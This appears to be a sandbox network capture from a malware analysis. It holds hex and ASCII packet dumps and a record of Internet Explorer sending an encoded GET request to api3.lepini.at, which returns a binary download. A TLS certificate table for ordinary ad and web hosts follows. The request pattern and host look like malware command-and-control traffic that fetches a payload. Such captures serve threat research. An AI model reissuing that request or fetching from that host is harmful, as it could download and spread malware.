Feb 12, 2021 01:50:13.136946917 CET	3958	IN	Data Raw: 2a dc f4 61 b7 26 1d 27 37 78 5d 8a 6d 33 6b 11 45 cd c6 40 5f 4c 7a 5a 13 9b ba 0e 70 09 94 a1 6b 89 1f e4 c3 19 d5 22 d4 f6 bd 84 d2 0c b6 69 11 7e b5 43 8c a3 2c 5b 3e b5 8b f8 4f 94 60 8f af ed e9 19 9b ba ae b1 b2 8d a1 e9 87 50 43 16 7b f5 Data Ascii: a&'7x]m3kE@_LzZpk"i~C,[>O`PC{8L,9/u%^[8^-K]2k\[qg8.mtO-uGj`(]_KT^.4Go@@K($VS5~WCx/:+=}p<0G0Un=`YM>1MQR{
Feb 12, 2021 01:50:13.136984110 CET	3959	IN	Data Raw: b9 cb 3a fc c3 8e 61 9f ea 3d 43 08 86 09 d9 93 cc 16 46 f7 77 a1 97 21 20 fd 7d 01 a8 15 9f 19 a6 fa fb f2 69 8a 85 8e 0e 80 bf f0 f5 be b8 b3 58 ce c2 2d c0 4b ad 90 33 d1 2b 70 78 c0 8c bc e2 56 c0 43 47 34 a8 8b 51 9c 49 16 87 fb c2 ff d8 a3 Data Ascii: :a=CFw! }iX-K3+pxVCG4QI"7_p=}R?Z.E-4G,I0Q&.hem!fR orLr&3hE/I62{*DB9WYyA~k1Pm'@D2ub^#5
Feb 12, 2021 01:50:13.137022972 CET	3961	IN	Data Raw: 5c 5b 75 3a 78 17 79 84 c7 17 3e 92 d3 58 2a 65 a1 20 a6 e9 19 f3 e0 96 c1 10 d0 c9 5a ec e5 4b 9f 3d 0c c4 95 d4 8b 0a 15 e2 a4 ad 1d 84 ac 21 06 39 54 63 16 3b 4e ac e6 8c c9 0c ac 25 1f 46 6c a7 4a a4 7e 6e f0 ae 75 e9 07 79 7f 85 58 dd 98 fc Data Ascii: \[u:xy>X*e ZK=!9Tc;N%FlJ~nuyX""rzu2U-g)i;xiJY,g1S>VU1qnS9r(H\(.+J5!y8T$P8`#QO[__N4CAti;<h$%!58
Feb 12, 2021 01:50:13.137063980 CET	3962	IN	Data Raw: ad 99 5f 7b 9d f4 dc 6a 10 75 57 01 eb 1c 83 cd 3c 30 a7 5f ca e1 f8 94 36 a0 af 75 44 c0 e0 1f 83 b1 62 f2 76 c1 81 ea 10 6a a9 86 63 44 f1 d6 e0 26 41 7c b9 47 88 e8 8e 90 c3 63 78 e4 74 b8 98 45 53 cb 49 af d7 3c 66 85 6a 71 50 c0 a7 59 a8 47 Data Ascii: _{juW<0_6uDbvjcD&A\|GcxtESI<fjqPYGC$b0\|m.pEImJ!{S9i6>P>6H!9>B,QBr-YQdR<RWgQ-P;b8\|W1bEsXMgk
Feb 12, 2021 01:50:13.137113094 CET	3963	IN	Data Raw: 4d 3d f9 f1 f4 56 19 f4 76 82 0a c7 93 64 20 5b 5e 5a 34 e5 72 5a c2 95 70 65 f8 6a 72 46 bc 78 1f 1d 7e f9 3f eb 44 ab e1 1e 0f c2 07 b8 d5 eb 65 f9 6d 4d 0d ff 22 0a e6 53 a1 20 02 28 e4 2c 95 fd 91 2d 7e 2a 65 b9 4f 7e 3d 75 59 34 ae ac b6 e1 Data Ascii: M=Vvd [^Z4rZpejrFx~?DemM"S (,-~eO~=uY4=>Oj^m'<KOwQuZX1<lX[QDr-B#wQ}W;gQFz*xJ!+/0LpX=@
Feb 12, 2021 01:50:13.137156963 CET	3965	IN	Data Raw: 12 a7 db 82 53 4c e7 c9 fb 66 28 66 90 51 d3 59 57 f4 63 61 b7 03 ac 69 fc be 5b 53 c8 31 d9 32 12 36 0f 8c 6b 9a 1e 22 76 e7 62 92 a6 22 54 67 e8 24 51 ba bb 30 33 19 15 83 2b fa 2c a7 04 73 d7 f7 de 68 5e 15 9b c6 d3 5e ad b8 0d c6 9a 46 e4 63 Data Ascii: SLf(fQYWcai[S126k"vb"Tg$Q03+,sh^^FcAno2a:F\{j!je]<FQ:)8$%}ohU6AoPaso{`\EvalnKxL^Wi*t<[{Ov3;yqLl
Feb 12, 2021 01:50:13.137193918 CET	3966	IN	Data Raw: a8 31 eb 3e fe 14 cd 4b ed ca 29 b9 e9 22 2e 84 a2 39 3b 68 a5 04 5e c5 96 53 18 a5 28 1d 6c 08 16 50 9c 9f 5e 18 d1 ab 7e 9c 18 ea 0c b7 65 27 f0 c0 a4 8c 07 67 4c d9 b6 28 70 fb 98 4a 1c 9f a1 11 b2 95 59 fa e2 86 db bf 9a e2 00 83 25 10 fc 99 Data Ascii: 1>K)".9;h^S(lP^~e'gL(pJY%<:-W8R \|[>2D1G0_P)ZzbE7yzr4R/f+M-J*bHAy5DI0KKc!ZNkI\|
Feb 12, 2021 01:50:13.137233019 CET	3968	IN	Data Raw: be cc 36 22 ca 31 ac 9f d9 e4 00 55 f3 44 a9 9f a5 f7 bf 93 46 05 b6 a7 f3 b0 db f0 93 35 05 54 fc 1f de b2 55 d9 5e 86 7e 6a ca 28 55 9d 0c 68 25 d1 ca 71 a9 17 4b dc 85 55 c7 58 ae 8b f4 b4 e7 4a cf e9 32 e3 05 3c 62 6c 63 f7 43 2c b1 eb 15 83 Data Ascii: 6"1UDF5TU^~j(Uh%qKUXJ2<blcC,`Tz 8/aj/=*,"Kz]j3@V$vTC(Y9VVJ:c@b2=m'fknnHec([1\|[zLI]XE5"loc-
Feb 12, 2021 01:50:13.212085009 CET	3969	IN	Data Raw: 53 1a ee ed 81 3d 11 53 74 df b4 3a 8b 7c 7b d2 a5 8d ba 09 11 e3 cb c6 b4 d1 1b 63 e4 9a ec d7 42 91 6e 7f ee e0 3a fe 82 cf e7 2b 6c c9 45 88 c8 2a 4b 7f bf 1f 9d 12 ef 24 a2 4e e2 2e 26 d5 6b 2e 7b 0d ab 33 15 e6 e0 73 a4 3d 93 91 80 c2 1f ba Data Ascii: S=St:\|{cBn:+lEK$N.&k.{3s=oDW%e1VoJ&m(J!!I#Ww\H;'MkfyCtH7.)ZF}t3G^GfEd}"x(<9ag3x\|wH5

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.4	49774	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 01:50:14.121726990 CET	4300	OUT	GET /api1/4ZiHzRCntPm2_2Bs_/2FRsqW01GOmk/jlSxz1SigWt/9VO23wgzmt0z6v/oeSxd8UkQmb8DtzG6cPTd/ym_2By61IoxlQY3M/yETa3aFgtQZDw09/uFg9yjZYa11Lr07gXa/S4TdWO0jq/r61swA9KHU0n7D5WiS6M/aB0_2F0q98FaVumUgko/cxT6YBLiCeGe4HDHV0QwGa/JrNDDK39RFrqA/bnSciaqC/5xKVdu46G4ukxU_2BpjItQZ/vWdcVJKKZr/8uf5Z_2FSSRnkdJI6/EcvRjJAc0DIs/MbGP9aL3I1L/I1KoMe2FXtyIq_/2Fdget5Pj/NB HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Host: api3.lepini.at
Feb 12, 2021 01:50:14.743350029 CET	4302	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Feb 2021 00:50:14 GMT Content-Type: application/octet-stream Content-Length: 467525 Connection: close Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: attachment; filename="6025d0c68ae80.bin" Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: eb 68 85 f6 ac c8 d8 df 41 81 0d 82 b6 7c cf 81 c2 80 f5 27 a6 1a dc 17 d0 e2 70 cc 60 8d d3 b6 66 51 66 64 9f f9 18 89 57 de e3 88 0f 03 37 be 70 0d 3c 87 75 42 39 37 bd 2f 2e fb 6a 2c f8 74 74 c0 1b 8f bb 1d 30 f3 c4 ee 4c a6 b6 69 04 49 18 44 6b f5 47 24 00 4a 59 15 47 7f 09 1f 54 f6 12 e8 77 4e 20 86 ff 2b 71 a9 d0 65 62 b8 f2 fd e7 c6 32 40 14 29 eb a2 0c 79 7e c5 36 17 6f 4a 38 61 5b bd 36 22 82 1f 8f 49 e1 38 8a 2f 88 da b5 0e 81 d6 42 3f c9 c3 94 19 df c2 f5 0f 2a 87 1b c6 a7 29 97 12 e6 07 dd 73 e5 1a cc ce e1 eb c8 63 88 4e 58 20 3e bb 20 0f 74 77 1d 61 58 90 63 0f 89 db df 28 8a 94 8c d5 9d cb d5 e8 50 ec 79 ce 57 66 ce 57 6c 29 83 80 50 e5 e9 0f c4 91 a2 37 e6 58 65 4f 13 9a 7f 2a 24 46 e2 8c 6e bc 22 46 6d 7f 25 4b 24 90 b2 cd 9b 3d 47 0d d6 b7 77 6a e9 0d 8c 6e 30 81 55 94 ca ab a6 7e 29 22 d9 2b 92 e8 b2 20 8c 3b 37 d9 4e 63 04 b6 15 38 dc 55 f5 eb 77 40 0c f8 50 77 bb 7c 4f 15 ce af 94 4a b9 39 ac da 6c e5 40 1d 4a 9a b4 b7 b2 fa 2e 1b 40 07 76 8f c8 1b f8 eb e6 7d 17 8d 84 66 84 f2 1a ea ef 51 4d 43 52 fe 33 da cb 8a a5 61 7f 76 ea 83 c2 c4 51 b8 37 dd f1 1e c9 26 d6 08 ae d4 b3 76 34 77 0f 61 80 ca 13 85 51 c5 d9 bf 04 59 53 81 dd 4e 27 0c 80 11 f6 4a d6 79 0b f7 63 a6 e5 d0 8e 40 52 80 71 e7 3a 85 8b a0 05 15 e8 da 16 70 99 93 e6 86 03 57 d9 f0 ed e2 22 fc 71 3e e1 eb 67 b1 d4 d0 d6 bb 97 55 53 48 a4 8c c9 66 fa 20 e9 67 9e 98 5a 51 a4 43 f3 9c 5b 89 d3 46 ce 6f a2 dd 0a 53 a9 9c d1 08 0e 84 11 9f 76 61 9e 7d a9 97 7b 15 0b 31 ec 73 9f 20 70 32 f2 46 e6 f6 e3 db c9 bb 10 27 f8 96 a2 7e 4a 9e ac 7d f0 97 a2 a0 a9 48 4f 16 15 e8 91 ca ce 11 ea 58 84 ee 00 b5 fa 93 96 cb 9e 59 7e d0 c2 78 17 e3 74 28 79 6a 17 03 90 9a 45 b3 b2 9d 30 08 f1 b7 eb 9b ba 58 be 37 85 c6 a3 ee c4 01 ab 84 51 1c 25 c7 cc 44 47 f0 d7 c2 55 49 55 4f 0c 3b b5 d3 6d 4c 1f 5a 07 f5 78 76 6c bc 5c c7 b8 81 8b a2 86 4d c8 b0 db 0e 54 93 52 bf 99 a4 9a 2d 62 ae 90 f5 c8 48 71 e6 5d bf 19 7e 3b 95 0f 91 06 c4 77 59 7b b9 8c 67 01 29 d9 35 c3 ea f6 03 0f 3e 43 54 d4 2c 07 7f 96 51 8e 55 c6 72 5f 53 44 d6 25 08 fb 34 c5 8b 50 62 8a 14 3a cd bd 71 a8 60 3a 53 c5 67 d6 b0 07 2e 9a f0 25 a6 18 f3 33 c2 3d 5d 8e c6 64 d7 62 a8 51 79 af 66 67 b8 7d b9 e4 6f 55 12 c9 4f aa 5d a6 52 08 db 31 d2 ee b1 1f 27 6a aa 89 c9 10 17 8d 57 da 70 79 94 a7 2b 94 d4 53 8e ce 53 d9 9e f7 97 ec 3d e2 0d 04 e0 2b 41 2b 37 0b b6 e1 8f 27 00 4c 41 29 20 51 4a d1 c8 fd f2 18 10 55 c9 a0 fa 1c 6a 97 45 70 c1 a1 3c 24 55 2d 20 bd 46 7f c4 b9 49 5d b0 a9 8d a1 b7 3e 09 d4 f3 c2 cc 7a dc a7 bb 40 e5 56 6b 1d 5b 54 1f 04 70 88 89 a8 7e 84 7d fe 1e de 7a a0 09 f4 0c a0 1e a0 51 d8 9e 59 cd 25 2b 17 d0 81 d0 42 3e 10 ce 20 83 57 75 8a 53 af 37 10 54 95 a6 8b dc 99 86 79 40 3b 13 c2 74 35 ce eb 7e 45 44 19 5c 96 08 01 5c 34 3f 3c b4 1e 9a 27 2c 90 Data Ascii: hA\|'p`fQfdW7p<uB97/.j,tt0LiIDkG$JYGTwN +qeb2@)y~6oJ8a[6"I8/B?)scNX > twaXc(PyWfWl)P7XeO$Fn"Fm%K$=Gwjn0U~)"+ ;7Nc8Uw@Pw\|OJ9l@J.@v}fQMCR3avQ7&v4waQYSN'Jyc@Rq:pW"q>gUSHf gZQC[FoSva}{1s p2F'~J}HOXY~xt(yjE0X7Q%DGUIUO;mLZxvl\MTR-bHq]~;wY{g)5>CT,QUr_SD%4Pb:q`:Sg.%3=]dbQyfg}oUO]R1'jWpy+SS=+A+7'LA) QJUjEp<$U- FI]>z@Vk[Tp~}zQY%+B> WuS7Ty@;t5~ED\\4?<',
Feb 12, 2021 01:50:14.743424892 CET	4303	IN	Data Raw: 2b 3e e0 c3 c6 24 90 21 f1 1e 15 d8 39 5e 7e 9d d3 46 8f da a0 ec 4a 1c a4 24 95 fc 63 ed aa 97 b6 ae 82 c0 1f 23 76 44 92 03 21 27 90 53 05 73 85 6e 6f 87 f4 e4 7d a2 7e 7a 80 a4 c2 81 4b ee 4e 8b 09 ad c7 cd 92 4f 27 75 cf 98 c1 25 a5 15 9d cb Data Ascii: +>$!9^~FJ$c#vD!'Ssno}~zKNO'u%u[p[c0J.?Kcw^MI&24#7NG*,xhDe:W-.'#&LUZC$$3U2Bk!n4F=w93hM5
Feb 12, 2021 01:50:14.743463039 CET	4304	IN	Data Raw: c7 c6 e6 31 9e 70 f6 0d 3a 1a a8 fc 4f e6 d8 a3 fa c7 ab 85 af a4 e8 45 96 41 db 93 54 48 d2 38 40 dc 4d de 98 1d 51 4d fb 5e 4a 6c 63 1d a3 5a 8a f5 d3 b7 4e ae 45 e9 79 c6 34 e3 c6 74 74 0f f3 bf ce f2 98 66 33 a5 4d e1 9e b7 29 18 b9 6b fb 45 Data Ascii: 1p:OEATH8@MQM^JlcZNEy4ttf3M)kEo=gCOcqmHPPKPZM$gjK:I&ECZ_iZ"z^@HuPne_Eu+(o*0/1YTVvjbw"9
Feb 12, 2021 01:50:14.743503094 CET	4306	IN	Data Raw: 19 b7 5c b5 c3 ff d6 28 24 91 28 42 eb 74 23 bf d7 c3 42 b6 d1 fd eb e5 48 64 3f 66 4a 64 ef 97 68 26 99 d6 6f ca 42 0f 85 ea 20 21 66 df 42 6a 22 10 ec 9e e2 c6 b7 9c f8 15 99 13 18 37 cc f1 ad 63 86 f9 c8 f4 cb 55 d6 27 e7 2f 1c fa 9b da 17 ed Data Ascii: \($(Bt#BHd?fJdh&oB !fBj"7cU'/G/E&c_$^,Ejiu+U7ZXOI_'Cyff*4-be/_T](E_oWq[/B9Jj~\Y\0m66f\|!EnTTY8[v$J
Feb 12, 2021 01:50:14.743541002 CET	4307	IN	Data Raw: 1b 69 3d 00 20 1e 4c 7e f9 af 41 20 44 57 fc 6e 74 69 6d 9c f2 2f ef 98 c7 e8 ae 03 8d 87 a1 87 40 75 76 19 7c 6e 6c a7 f3 c5 32 cf 9b 42 79 a0 e1 e6 34 34 77 e9 a4 28 1b 44 c3 43 e6 e5 60 d9 fe 1e b5 e2 ec f1 dd 59 7f 4a 71 ea 3d 5e 10 94 77 30 Data Ascii: i= L~A DWntim/@uv\|nl2By44w(DC`YJq=^w0"}r=\d$#>~~izg$LpkPSqPnIe_7rtQC~P_0e!s.+KG;0 nHF'w+=#Jpz/Zs(nI:}r<-
Feb 12, 2021 01:50:14.743590117 CET	4309	IN	Data Raw: 48 68 37 5a a0 0a 02 b1 bc c3 2e 41 e7 a5 78 34 f6 b7 dc 50 5b 27 4f 7a ae 4d 96 cb 1a 01 d9 59 a8 d8 44 ee a3 3f 7c 1e 68 bc 23 91 ef f0 b1 d7 0c f4 4c ea 5b ee f8 d2 5f bd 08 ff 67 db 34 6e 81 67 63 f9 ce 28 22 dd 73 94 58 26 fa cd b5 99 d0 92 Data Ascii: Hh7Z.Ax4P['OzMYD?\|h#L[_g4ngc("sX&H2C@'X%N)r>]n(i_/L`]r?lQ,`kjx&(lB+.Lz)i\| fWh9~QKbG1);Sp-D
Feb 12, 2021 01:50:14.743655920 CET	4310	IN	Data Raw: 1d 13 a3 46 69 df 0c 90 bb 68 9a 38 64 47 d4 54 2b 79 ac 8d 74 03 d9 3c 7a ba 45 78 60 a3 00 9a 64 ea 41 40 46 da 53 c4 e4 97 88 d2 4e 50 85 2d 25 1a b0 ca c4 da 12 35 65 78 83 73 64 51 84 09 91 b4 7b 69 34 48 ce 4a 27 fc 92 cc 00 b8 32 83 3f 2f Data Ascii: Fih8dGT+yt<zEx`dA@FSNP-%5exsdQ{i4HJ'2?/P[@=Qsx=Z>(aguR/6z!r,[`&lpU`:)ZDe\|=T KOcAei3/x7<*YuL^8J4N)h,aA{'].
Feb 12, 2021 01:50:14.743695021 CET	4311	IN	Data Raw: da 71 33 28 6a d7 08 af 75 5e 7d 36 7b bc 83 e3 c2 ca 8e 86 96 63 cc 6b 74 09 77 fd c4 68 3f eb 2d d0 83 4f 84 49 fb b5 e2 f3 e7 fb f2 be 90 bb e7 a0 45 4c 5c bd 72 56 97 99 24 0b 78 72 6b 60 e3 91 75 c1 ac 42 f1 2d e3 64 f4 58 0b 7f 76 eb 52 90 Data Ascii: q3(ju^}6{cktwh?-OIEL\rV$xrk`uB-dXvR?H ^0RTq3>f-!X?(uk)Z]e>ez9}sb`[(cQ<6DZR]PE8B0,U 6YLr)kr`Emwi
Feb 12, 2021 01:50:14.743733883 CET	4313	IN	Data Raw: 7d 2f 67 33 07 ff ce 6f 97 9e 77 fc 42 b8 8a ac d7 58 30 d0 08 f3 75 a6 66 05 d0 ab 18 a6 f3 12 fb 07 d7 91 33 8d 6a e1 1f 73 5d d2 7f b2 37 cc 4c 45 d7 75 70 b1 6b 49 b0 2e 75 64 4c f3 6a 46 5c 76 aa 1a cd 6b 3c 0b 7c f7 48 0c 3d 3d d4 9c 95 21 Data Ascii: }/g3owBX0uf3js]7LEupkI.udLjF\vk<\|H==!kaLVbT5KY) SE\|&\|[ZW$FZb:5b8/Bcgv:m)DJ5F6Kr!/Im1q$\SE4~?<jC
Feb 12, 2021 01:50:14.743773937 CET	4314	IN	Data Raw: eb d6 54 15 87 81 82 88 21 52 9a 1d 15 db a3 d4 1a c7 f7 a8 90 48 54 a9 78 1a 54 df 80 84 20 74 f2 d9 f9 ce 7e 21 23 d1 a6 99 ae c9 32 27 63 ec a3 91 63 bd d1 49 af 12 01 5e 63 c2 1a 28 e8 53 3b c6 ad 65 d2 bd 15 21 bf 10 c7 f3 06 6e 3f d5 1e e8 Data Ascii: T!RHTxT t~!#2'ccI^c(S;e!n?!c?a{UMZ9%n/37!:i&/x7>8c(>l)(Fm'3GSz;g*V9KJQq}w:j3"[[}%FrqKd+95 8Yh
Feb 12, 2021 01:50:14.820856094 CET	4316	IN	Data Raw: 52 17 43 ea 07 6d 1c 2e 8c 2a cf f1 e8 c5 db 1a ae c8 ea ab 62 74 8d f2 92 ef f2 4d e4 da 9b 88 5a 3e 79 f2 6d e8 4d b1 87 60 7e 75 89 b1 93 60 cb d5 53 80 a6 64 5a b1 8b c2 bb a2 74 03 1b f0 92 5b 45 c9 0a 4c 20 f5 64 14 37 63 55 b9 77 c8 1a b7 Data Ascii: RCm.*btMZ>ymM`~u`SdZt[EL d7cUwkoh!I$6yV)1c7GP^<As56mJEuF%w%4Kg)e8k>]{8hFnB\s #y~ /

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Feb 12, 2021 01:47:04.054167032 CET	104.20.185.68	443	192.168.2.4	49720	CN=*.onetrust.com, O=OneTrust LLC, L=Sandy Springs, ST=Georgia, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu May 21 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013	Wed Jul 27 14:00:00 CEST 2022 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 12, 2021 01:47:04.054167032 CET	104.20.185.68	443	192.168.2.4	49720	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c
Feb 12, 2021 01:47:04.113539934 CET	104.20.185.68	443	192.168.2.4	49721	CN=*.onetrust.com, O=OneTrust LLC, L=Sandy Springs, ST=Georgia, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu May 21 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013	Wed Jul 27 14:00:00 CEST 2022 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 12, 2021 01:47:04.113539934 CET	104.20.185.68	443	192.168.2.4	49721	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c
Feb 12, 2021 01:47:07.906945944 CET	151.101.1.44	443	192.168.2.4	49739	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 12, 2021 01:47:07.906945944 CET	151.101.1.44	443	192.168.2.4	49739	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Feb 12, 2021 01:47:07.907108068 CET	151.101.1.44	443	192.168.2.4	49735	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 12, 2021 01:47:07.907108068 CET	151.101.1.44	443	192.168.2.4	49735	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Feb 12, 2021 01:47:07.907742023 CET	151.101.1.44	443	192.168.2.4	49738	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 12, 2021 01:47:07.907742023 CET	151.101.1.44	443	192.168.2.4	49738	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Feb 12, 2021 01:47:07.907888889 CET	151.101.1.44	443	192.168.2.4	49737	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 12, 2021 01:47:07.907888889 CET	151.101.1.44	443	192.168.2.4	49737	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Feb 12, 2021 01:47:07.918412924 CET	87.248.118.23	443	192.168.2.4	49732	CN=*.yahoo.com, O=Oath Inc, L=Sunnyvale, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Jan 14 01:00:00 CET 2021 Tue Oct 22 14:00:00 CEST 2013	Wed Mar 03 00:59:59 CET 2021 Sun Oct 22 14:00:00 CEST 2028	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 12, 2021 01:47:07.918412924 CET	87.248.118.23	443	192.168.2.4	49732	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Oct 22 14:00:00 CEST 2013	Sun Oct 22 14:00:00 CEST 2028		9e10692f1b7f78228b2d4e424db3a98c
Feb 12, 2021 01:47:07.924014091 CET	151.101.1.44	443	192.168.2.4	49736	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 12, 2021 01:47:07.924014091 CET	151.101.1.44	443	192.168.2.4	49736	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Feb 12, 2021 01:47:07.924952030 CET	87.248.118.23	443	192.168.2.4	49733	CN=*.yahoo.com, O=Oath Inc, L=Sunnyvale, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Jan 14 01:00:00 CET 2021 Tue Oct 22 14:00:00 CEST 2013	Wed Mar 03 00:59:59 CET 2021 Sun Oct 22 14:00:00 CEST 2028	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
